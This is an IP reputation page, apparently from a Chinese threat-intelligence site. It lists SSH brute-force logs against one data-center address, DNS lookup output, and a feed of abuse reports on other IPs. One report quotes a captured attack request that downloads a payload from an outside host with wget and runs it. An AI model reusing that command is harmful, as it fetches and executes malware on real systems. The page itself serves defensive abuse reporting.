66.187.161.112

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America

运营商(isp): Dasia.net LLC

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	Apr 17 01:48:46 web1 sshd\[15494\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=66.187.161.112 user=root Apr 17 01:48:48 web1 sshd\[15494\]: Failed password for root from 66.187.161.112 port 42070 ssh2 Apr 17 01:52:40 web1 sshd\[15894\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=66.187.161.112 user=root Apr 17 01:52:41 web1 sshd\[15894\]: Failed password for root from 66.187.161.112 port 50400 ssh2 Apr 17 01:56:29 web1 sshd\[16275\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=66.187.161.112 user=root	2020-04-17 20:10:30

类型

评论内容

时间

attack

Apr 17 01:48:46 web1 sshd\[15494\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=66.187.161.112  user=root
Apr 17 01:48:48 web1 sshd\[15494\]: Failed password for root from 66.187.161.112 port 42070 ssh2
Apr 17 01:52:40 web1 sshd\[15894\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=66.187.161.112  user=root
Apr 17 01:52:41 web1 sshd\[15894\]: Failed password for root from 66.187.161.112 port 50400 ssh2
Apr 17 01:56:29 web1 sshd\[16275\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=66.187.161.112  user=root

2020-04-17 20:10:30

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 66.187.161.112
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14729
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;66.187.161.112.			IN	A

;; AUTHORITY SECTION:
.			450	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020041701 1800 900 604800 86400

;; Query time: 167 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Apr 17 20:10:25 CST 2020
;; MSG SIZE  rcvd: 118

HOST信息:

112.161.187.66.in-addr.arpa domain name pointer 112.161.187.66.static.Dasia.Net.

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
112.161.187.66.in-addr.arpa	name = 112.161.187.66.static.Dasia.Net.

Authoritative answers can be found from:

最新评论:

IP	类型	评论内容	时间
47.91.146.131	attackbots	Unauthorized connection attempt detected from IP address 47.91.146.131 to port 8545 [J]	2020-01-25 03:53:46
222.163.37.53	attackbotsspam	MYH,DEF GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE	2020-01-25 04:14:32
68.183.178.162	attack	Jan 24 19:45:02 XXXXXX sshd[25428]: Invalid user k from 68.183.178.162 port 34932	2020-01-25 04:16:15
45.134.179.10	attack	firewall-block, port(s): 11189/tcp	2020-01-25 03:54:14
185.176.27.42	attack	Jan 24 21:24:15 debian-2gb-nbg1-2 kernel: \[2156731.035984\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=185.176.27.42 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=246 ID=12762 PROTO=TCP SPT=56806 DPT=3658 WINDOW=1024 RES=0x00 SYN URGP=0	2020-01-25 04:24:49
180.76.150.17	attack	Jan 24 21:47:45 pkdns2 sshd\[11798\]: Invalid user valere from 180.76.150.17Jan 24 21:47:47 pkdns2 sshd\[11798\]: Failed password for invalid user valere from 180.76.150.17 port 38836 ssh2Jan 24 21:49:52 pkdns2 sshd\[11883\]: Invalid user egon from 180.76.150.17Jan 24 21:49:54 pkdns2 sshd\[11883\]: Failed password for invalid user egon from 180.76.150.17 port 55466 ssh2Jan 24 21:52:24 pkdns2 sshd\[12073\]: Invalid user guest from 180.76.150.17Jan 24 21:52:27 pkdns2 sshd\[12073\]: Failed password for invalid user guest from 180.76.150.17 port 43872 ssh2 ...	2020-01-25 04:02:41
80.82.78.85	attack	Port-scan: detected 598 distinct ports within a 24-hour window.	2020-01-25 04:23:52
92.249.250.168	attack	firewall-block, port(s): 9981/tcp	2020-01-25 03:55:20
5.114.241.107	attackspambots	Unauthorized connection attempt from IP address 5.114.241.107 on Port 445(SMB)	2020-01-25 04:07:59
183.82.114.216	attackbotsspam	Unauthorized connection attempt from IP address 183.82.114.216 on Port 445(SMB)	2020-01-25 04:11:20
122.100.164.1	attack	Unauthorized connection attempt from IP address 122.100.164.1 on Port 445(SMB)	2020-01-25 04:10:22
47.244.107.103	attackspam	SIP/5060 Probe, BF, Hack -	2020-01-25 03:59:17
106.12.23.223	attackspam	Invalid user info from 106.12.23.223 port 58944	2020-01-25 04:12:57
105.235.214.60	attackspam	Telnet/23 MH Probe, BF, Hack -	2020-01-25 04:22:28
85.37.38.195	attack	Jan 24 16:03:18 sd-53420 sshd\[11227\]: Failed password for invalid user princess from 85.37.38.195 port 53565 ssh2 Jan 24 16:06:12 sd-53420 sshd\[11651\]: Invalid user tk from 85.37.38.195 Jan 24 16:06:12 sd-53420 sshd\[11651\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.37.38.195 Jan 24 16:06:14 sd-53420 sshd\[11651\]: Failed password for invalid user tk from 85.37.38.195 port 5859 ssh2 Jan 24 16:09:03 sd-53420 sshd\[12201\]: Invalid user pippo from 85.37.38.195 ...	2020-01-25 04:30:17

最近上报的IP列表

83.56.152.49	58.87.68.202	183.91.2.115	139.205.177.87
49.234.212.177	167.71.7.119	162.251.203.212	49.32.19.203
178.165.57.137	58.229.187.67	116.196.106.61	106.13.29.92
237.81.167.34	253.151.0.32	188.130.149.64	179.191.237.172
120.53.2.118	91.121.49.238	182.254.136.127	104.131.216.136